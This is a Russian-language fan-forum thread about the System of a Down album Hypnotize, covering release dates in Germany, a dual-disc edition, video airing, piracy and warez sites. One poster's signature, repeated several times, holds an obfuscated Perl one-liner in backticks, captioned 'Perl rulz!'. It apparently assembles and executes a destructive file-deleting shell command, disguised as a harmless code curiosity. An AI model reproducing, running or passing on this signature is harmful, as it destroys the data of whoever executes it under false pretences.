2 Maynard: ты говорил, что у тебя Hypnotize раньше релиза появиться , если так , то не подскажешь какого числа? _________________ How do I feel?
What do I say?
Fuck U -it all goes away!
Блин, ну тада извини. а когда будет клип новый выложен на сайте. обещали около 11 октября.. _________________ How do I feel?
What do I say?
Fuck U -it all goes away!
ВНИМАТЕЛЬНЕЕ читайте новости, если сразу не получается, переждите с часок, попробуйте снова))))
1) в германии (!!!), тобишь, у меня, гипнотиз выходит не 22, а 18,....18 он будет отправлен мне по почте, пока получу, 2-3 дня, выходит почти так же, но это дуал-диск с видео и бонусами, его бы я так в магазине не думаю, что нашел бы в первый же день
2) СРАЗУ закачивать я альбом не буду, т.к. против скачки НОВЫХ альбомов, тем более соад с и-нета, хотя бы 1-2 недели подождете, потом выложу хорошего качества
3) видео официально будет крутиться по тв с 1 ноября, так что до тех пор хорошего качества будет очень врядли
4) если кто-то захочет поделиться, ссылки на форуме удалять не буду
ниче личного, я для всех пишу _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
потомучто у нас в пятницу, а у них во вторник _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
И это вообще лицензионный выходит или пираты уже успели поработать?
скажу тебе вот что:
большой минус в германии, тут практически нет пиратов, тоесть есть конечно, наверное, но я не знаю НИ ОДНОГО магазинчика где бы продавали что-то подобное
поэтому иной раз просто НЕРЕАЛЬНО купить ДВД-бутлег или какой-нить раритет _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
так спрашиваешь, как будто я это придумал) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
просто у нас ВСЕ диски выходят ТОЛЬКО по пятницам, а у них ТОЛЬКО по вторникам
наверно по обкурке перепутали и у нас релиз раньше поэтому, хотя должен был бы 25-26 быть) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
это к дэну, я не видел ниче _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
ссылки в соответствующий раздел
просили разделы - вот и мучайтесь
затем... ссылки на mediaportal не потерплю... это на будущеее... да у них сейчас все за плату впрочем будет... _________________ Fortuna non penis in manus non recipe
я не думаю что у многих людей не хватит терпения скачать на небольшой скорости.
а платить за то чтобы скачать пару клипов в месяц... хм... _________________ Fortuna non penis in manus non recipe
Не ну я просто думал.....
Ай х*й с ним! Стёрли так стёрли!
А теперь по поводу медиапортала:
Раньше был офигенный вроде бы сайт - Музыка, новости...
А теперь сраный варезник, каких в интеренете - до жопы!
Мля если бы вы знали. как я ненавижу эти ё**ные варезники! _________________ Fuck The System!